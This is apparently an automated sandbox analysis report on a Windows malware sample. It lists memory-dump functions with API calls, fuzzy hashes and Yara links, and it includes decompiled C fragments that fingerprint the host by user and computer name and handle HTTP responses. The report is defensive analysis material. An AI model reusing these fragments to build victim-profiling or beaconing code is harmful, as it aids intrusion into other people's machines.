0x03c4904d
0x03c49057
0x03c49060
0x03c49067
0x03c4907f
0x03c49083
0x03c490c0
0x03c49085
0x03c49088
0x03c49090
0x03c490a1
0x03c490ad
0x03c490b5
0x03c490b9
0x03c490b9
0x03c49083
0x03c490c8
0x03c490cd
0x03c490d4

APIs

GetTickCount.KERNEL32 ref: 03C48F9A
lstrlen.KERNEL32(?,80000002,00000005), ref: 03C48FDA
lstrlen.KERNEL32(00000000), ref: 03C48FE3
lstrlen.KERNEL32(00000000), ref: 03C48FEA
lstrlenW.KERNEL32(80000002), ref: 03C48FF7
wsprintfW.USER32 ref: 03C49030
lstrlen.KERNEL32(?,00000004), ref: 03C49057
lstrlen.KERNEL32(?), ref: 03C49060
lstrlen.KERNEL32(?), ref: 03C49067
lstrlenW.KERNEL32(?), ref: 03C4906E
wsprintfW.USER32 ref: 03C490A1

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: d099e6f35a6670967ee1a116dcbe7e01306bfd5aaa6e76d9fb337ddfce8898b8
Instruction ID: d1af2f4b3e497369ca44ce300bfc946fbd7693f6482b9a22f6bfe2634d8ebe41
Opcode Fuzzy Hash: d099e6f35a6670967ee1a116dcbe7e01306bfd5aaa6e76d9fb337ddfce8898b8
Instruction Fuzzy Hash: 0D410A76900219FBCF11EFA4CC48ADEBBB5EF48354F064050E905EB225DB369A55EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00426686, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004266E8
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004266FD
_memset.LIBCMT ref: 00426784
__invalid_parameter.LIBCMTD ref: 004267E4
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004267F6
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426831

Strings

P, xrefs: 00426806
", xrefs: 004267EC

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_$_memset$__invalid_parameter
String ID: "$P
API String ID: 2173491032-1577843662
Opcode ID: 6926c1857ee7e4275d174d626abb898f88021b03239a65d62f907565db59d3a3
Instruction ID: aa13bbb95f618d3b151525798ae6e2df992c037e860a82dd64cf7127d593eb27
Opcode Fuzzy Hash: 6926c1857ee7e4275d174d626abb898f88021b03239a65d62f907565db59d3a3
Instruction Fuzzy Hash: 80517F30A00219DBCB24DF98E845AEE7770FF44314F61862AE8255B3D1D7789956CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0041A655, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0041A669
__CrtIsValidHeapPointer.LIBCMTD ref: 0041A6F5
_CheckBytes.LIBCMTD ref: 0041A7A0
_CheckBytes.LIBCMTD ref: 0041A85A
_memset.LIBCMT ref: 0041A951
__free_base.LIBCMTD ref: 0041A95D

Strings

tDj, xrefs: 0041A6AB

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: BytesCheck$HeapPointerValid__free_base_memset
String ID: tDj
API String ID: 25084783-2513116121
Opcode ID: bf03bc9ee71fd0e9948ffe0be3212bf1a8bfa177b00786fdb9d082c4440d434f
Instruction ID: 820d4282217cd101df3eab7bdd4a3823256b09e8936f4cec7e4e81b47fc0bf92
Opcode Fuzzy Hash: bf03bc9ee71fd0e9948ffe0be3212bf1a8bfa177b00786fdb9d082c4440d434f
Instruction Fuzzy Hash: AA91F674A40204BBDB24DB44DD82FAA73B5AB44704F34416AF504AB3D2D279EED1CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00426220, Relevance: 12.2, APIs: 8, Instructions: 160COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042625E
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426288
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004262D3

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_
String ID:
API String ID: 1901436342-0
Opcode ID: f64ffea8f8edb0148ccc12a5d5809f960c683e262f5d56fd5a4148e7912998b6
Instruction ID: a20c0d1358a9805751481edd0fcde6f07a5af2ff114560a1ae226682b8616404
Opcode Fuzzy Hash: f64ffea8f8edb0148ccc12a5d5809f960c683e262f5d56fd5a4148e7912998b6
Instruction Fuzzy Hash: A6612D74A00119DFCB04DF95D9909EEB7B1FF58304F60815EE815AB390DB38AE41DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA01, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AA62
__aullrem.LIBCMT ref: 0042AC2F
__aulldiv.LIBCMT ref: 0042AC51

Strings

', xrefs: 0042AA01
9, xrefs: 0042AC62
0, xrefs: 0042AA1D

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
Instruction ID: 1c540c602cdc837943dc1318c843cef19469b666c24264c8efb1b011c0408318
Opcode Fuzzy Hash: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
Instruction Fuzzy Hash: AE41F471E05228CFDB24CF48D899BAEBBB6FB44304F5481DAD509A7240C738AE91CF46

Uniqueness

Uniqueness Score: -1.00%

Function 03C457DD, Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C457DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E03C41525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E03C48B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E03C429C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x03c457dd
0x03c457dd
0x03c457ed
0x03c457f0
0x03c457f4
0x03c457fa
0x03c457ff
0x03c45818
0x03c4582c
0x03c45833
0x03c4583a
0x03c4588d
0x03c45893
0x03c45899
0x03c458d4
0x03c458da
0x00000000
0x00000000
0x00000000
0x03c45899
0x03c45840
0x00000000
0x03c45847
0x03c45855
0x03c45858
0x03c4585b
0x03c45867
0x03c4586b
0x03c458cd
0x03c4586d
0x03c4587f
0x03c458bd
0x03c458c8
0x03c45881
0x03c45884
0x03c45888
0x03c45888
0x03c4587f
0x00000000
0x03c4586b
0x03c45840
0x03c45804
0x03c4580a
0x03c4580d
0x03c45812
0x00000000
0x00000000
0x00000000
0x03c458a2
0x03c458aa
0x03c458af
0x03c458b2
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 03C457F4
SetEvent.KERNEL32(?), ref: 03C45804
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03C45836
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4585B
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4587B
GetLastError.KERNEL32 ref: 03C4588D

Part of subcall function 03C429C0: WaitForMultipleObjects.KERNEL32(00000002,03C4A923,00000000,03C4A923,?,?,?,03C4A923,0000EA60), ref: 03C429DB

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

GetLastError.KERNEL32(00000000), ref: 03C458C2

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: decbd76a08cb1eacc1120abe55de5d915766aefda32412fb8f9ad58de555dae7
Instruction ID: caf7d2fe0b36e6efda4f5212d4dc6ce02670f6459433db764923897d93b50c1a
Opcode Fuzzy Hash: decbd76a08cb1eacc1120abe55de5d915766aefda32412fb8f9ad58de555dae7
Instruction Fuzzy Hash: B6311EB6D0030DFFDB20EFA5C88499EB7F8EB09304F14496AE542E6251DB719A489F50

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9EE, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AA62
__aullrem.LIBCMT ref: 0042AC2F
__aulldiv.LIBCMT ref: 0042AC51

Strings

9, xrefs: 0042AC62
0, xrefs: 0042AA1D

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
Instruction ID: 396c31ab095e84702acf4267d375628bd3e91e302f91addc66623ecb48fd166d
Opcode Fuzzy Hash: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
Instruction Fuzzy Hash: 1441F571E05228CFDB24CF48D899BAEBBB6FB44304F5481DAD549A7240C7386E95CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0042C643, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C6AA
__aullrem.LIBCMT ref: 0042C87A
__aulldiv.LIBCMT ref: 0042C89C

Strings

', xrefs: 0042C643
9, xrefs: 0042C8AD

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
Instruction ID: 30396c977b8188280cc5c68a0785371635c835bf4e9ce678c4df799497994858
Opcode Fuzzy Hash: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
Instruction Fuzzy Hash: B74146B1E0012ADFDB24CF58D881BAEB7B5FF85314F40809AD249AB200C3785E81CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 03C49FF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E03C49FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x3c4d32c; // 0x48f95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x3c4d32c; // 0x48f95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x3c4d32c; // 0x48f95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x3c4e81a) {
					HeapFree( *0x3c4d238, 0, _t10);
					_t7 =  *0x3c4d32c; // 0x48f95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x03c49ff6
0x03c49fff
0x03c4a00f
0x03c4a00f
0x03c4a014
0x03c4a019
0x00000000
0x00000000
0x03c4a009
0x03c4a009
0x03c4a01b
0x03c4a020
0x03c4a024
0x03c4a037
0x03c4a03d
0x03c4a03d
0x03c4a046
0x03c4a048
0x03c4a04c
0x03c4a052

APIs

RtlEnterCriticalSection.NTDLL(048F9570), ref: 03C49FFF
Sleep.KERNEL32(0000000A,?,03C430F3), ref: 03C4A009
HeapFree.KERNEL32(00000000,?,?,03C430F3), ref: 03C4A037
RtlLeaveCriticalSection.NTDLL(048F9570), ref: 03C4A04C

Strings

Ut, xrefs: 03C4A037

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: a0538ab15bac0bb8720c9d098baaff0913c7e6b3dc792667f8701fe76400af0e
Instruction ID: 9eafaa3e4408d66df3a2a333e8b24f0181ff0746e2ecdab6fa6e148950ee6da9
Opcode Fuzzy Hash: a0538ab15bac0bb8720c9d098baaff0913c7e6b3dc792667f8701fe76400af0e
Instruction Fuzzy Hash: 25F0D4BC641100AFE728FF65E889F25B7F4AB08740B088048E903CB269D734AC00CA20

Uniqueness

Uniqueness Score: -1.00%

Function 03C49267, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C49267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E03C41525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E03C48B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x3c49cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x03c49275
0x03c49278
0x03c4927b
0x03c49281
0x03c49286
0x03c4928c
0x03c49294
0x03c49297
0x03c4929d
0x03c492a2
0x03c492af
0x03c492bc
0x03c492c0
0x03c492c2
0x03c492c6
0x03c492c9
0x03c492d9
0x03c4932c
0x03c4932d
0x03c492db
0x03c492e0
0x03c492e1
0x03c492e6
0x03c492e9
0x03c492fc
0x00000000
0x03c492fe
0x03c49301
0x03c49306
0x03c49314
0x03c49317
0x03c4931d
0x03c49322
0x00000000
0x03c49324
0x03c49324
0x03c49327
0x03c49327
0x03c49322
0x03c492fc
0x03c49332
0x03c49333
0x03c492a2
0x03c49339

APIs

GetUserNameW.ADVAPI32(00000000,03C49CB0), ref: 03C4927B
GetComputerNameW.KERNEL32(00000000,03C49CB0), ref: 03C49297

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetUserNameW.ADVAPI32(00000000,03C49CB0), ref: 03C492D1
GetComputerNameW.KERNEL32(03C49CB0,?), ref: 03C492F4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,03C49CB0,00000000,03C49CB2,00000000,00000000,?,?,03C49CB0), ref: 03C49317

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: e261c835824fd769610bca2a6065cc35978bf03959070932257f16e5c2af168d
Instruction ID: 98790eabf677174a12470447d7320f9b8280b20c1bf6f93fc086aee8b5952564
Opcode Fuzzy Hash: e261c835824fd769610bca2a6065cc35978bf03959070932257f16e5c2af168d
Instruction Fuzzy Hash: FD21E876900218FFCB11DFE9D988DEEBBB8EF45204B5444AAE502E7240E7309B45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03C49EBB, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C49EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x3c4d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x3c4d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x3c4d258 = _t6;
					 *0x3c4d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x3c4d254 = _t7;
					if(_t7 == 0) {
						 *0x3c4d254 =  *0x3c4d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x03c49ec3
0x03c49ec9
0x03c49ed0
0x00000000
0x03c49f2a
0x03c49ed2
0x03c49eda
0x03c49ee7
0x03c49ee7
0x03c49f27
0x00000000
0x03c49f27
0x03c49ee9
0x03c49ee9
0x03c49eee
0x03c49f00
0x03c49f05
0x03c49f0b
0x03c49f11
0x03c49f18
0x03c49f1a
0x03c49f1a
0x00000000
0x03c49f21
0x03c49ee3
0x00000000
0x00000000
0x03c49ee5
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03C427C3,?,?,00000001,?,?,?,03C47F25,?), ref: 03C49EC3
GetVersion.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C49ED2
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C49EEE
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C49F0B
GetLastError.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C49F2A

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 94bf0f4cdd46b99c42ad9da5fb9d8402f70d9201b2ecbafe4596337baf7709f7
Instruction ID: 4d4705c00373da29e1f623ac6eb6bb7cae163447c0475fdf145453fa2af77e6e
Opcode Fuzzy Hash: 94bf0f4cdd46b99c42ad9da5fb9d8402f70d9201b2ecbafe4596337baf7709f7
Instruction Fuzzy Hash: 6BF0C278651312ABE730FF64AC2DF163BA0A780711F04451AFA43CA1D9E775ED01CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00427704, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00427763
_memset.LIBCMT ref: 004277EC
__invalid_parameter.LIBCMTD ref: 0042784B

Strings

P, xrefs: 00427860

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset$__invalid_parameter
String ID: P
API String ID: 2178901135-3110715001
Opcode ID: bf1c566b3bdcc293a4de1157825bea3b5270a3c98ed507f5cd2f9bc4e92757b0
Instruction ID: 072e5d8822180afe5407a3162e67d2332ed7960aff5c9493f364a755a7ad5020
Opcode Fuzzy Hash: bf1c566b3bdcc293a4de1157825bea3b5270a3c98ed507f5cd2f9bc4e92757b0
Instruction Fuzzy Hash: 07419A30E04209EBCB24DF58D888BAE7770FB40318F60C66AE8255B3D1D379A955CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0042C630, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C6AA
__aullrem.LIBCMT ref: 0042C87A
__aulldiv.LIBCMT ref: 0042C89C

Strings

9, xrefs: 0042C8AD

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
Instruction ID: d7d13701b48d747dff0fa2cefd15bad352bc5d919d586b7cde65ff065a9418d5
Opcode Fuzzy Hash: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
Instruction Fuzzy Hash: CB4135B1E1012ADFDB24CF58D881BAEB7B5FF85314F50809AD249AB240C7785E85CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C67E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C6AA
__aullrem.LIBCMT ref: 0042C87A
__aulldiv.LIBCMT ref: 0042C89C

Strings

9, xrefs: 0042C8AD

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
Instruction ID: b06734133fc4354661ed5df0f260f2f5641dcb269ed27f28783ae6e07cd6a026
Opcode Fuzzy Hash: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
Instruction Fuzzy Hash: 634126B1E4012A9FDB24CF48DC81BAEB7B5FF85310F4081AAD249A7201C7385E81CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA36, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AA62
__aullrem.LIBCMT ref: 0042AC2F
__aulldiv.LIBCMT ref: 0042AC51

Strings

9, xrefs: 0042AC62

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
Instruction ID: daf01bca3fd096f620174b3a6bdc7faa0620351ff17453eb1881909e5234635b
Opcode Fuzzy Hash: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
Instruction Fuzzy Hash: E041F371E01628CFEB24CF49DC99BAEBBB6FB44300F50859AD509A7240C7386E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9E5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AA62
_get_int64_arg.LIBCMTD ref: 0042AA8A
__aullrem.LIBCMT ref: 0042AC2F
__aulldiv.LIBCMT ref: 0042AC51

Strings

9, xrefs: 0042AC62

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
Instruction ID: 1bece789e13922f6438fa4eeba4707d2a2eb7b757b467285de51f36ddc11247a
Opcode Fuzzy Hash: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
Instruction Fuzzy Hash: B641E471E01228DFDB24CF49E899BAEBBB6BB44300F5081DAD509A7240C7386E91CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0042C627, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C6AA
_get_int64_arg.LIBCMTD ref: 0042C6D2
__aullrem.LIBCMT ref: 0042C87A
__aulldiv.LIBCMT ref: 0042C89C

Strings

9, xrefs: 0042C8AD

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
Instruction ID: 4f70dac0ba4e63cf7b108ab820f81e464416d1f8661d6720f1b1fdb534083d8f
Opcode Fuzzy Hash: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
Instruction Fuzzy Hash: 444126B1E4012A9FDB24DF58D881BAEB7B5FF85310F50809AE249A7201C7785E81CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00426563, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004265B4
__invalid_parameter.LIBCMTD ref: 0042664D
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042665F

Strings

u!h(d@, xrefs: 00426603

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~___invalid_parameter_memset
String ID: u!h(d@
API String ID: 255745848-2836208866
Opcode ID: 301ec4fe37e3e66e3018c715ff62c217443b36a025576531b86ff06dab55039e
Instruction ID: e66d81a407c4e47b1719e748bb94f56e86b0c4b2ceab1edb56babebfd1489ce8
Opcode Fuzzy Hash: 301ec4fe37e3e66e3018c715ff62c217443b36a025576531b86ff06dab55039e
Instruction Fuzzy Hash: AA31A070A00219EFCF24DF58E841BEE7771FB04304F61862AE8256B2D4D7B99895CB99

Uniqueness

Uniqueness Score: -1.00%

Function 03C4137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 03C413B6
SysFreeString.OLEAUT32(00000000), ref: 03C4149B

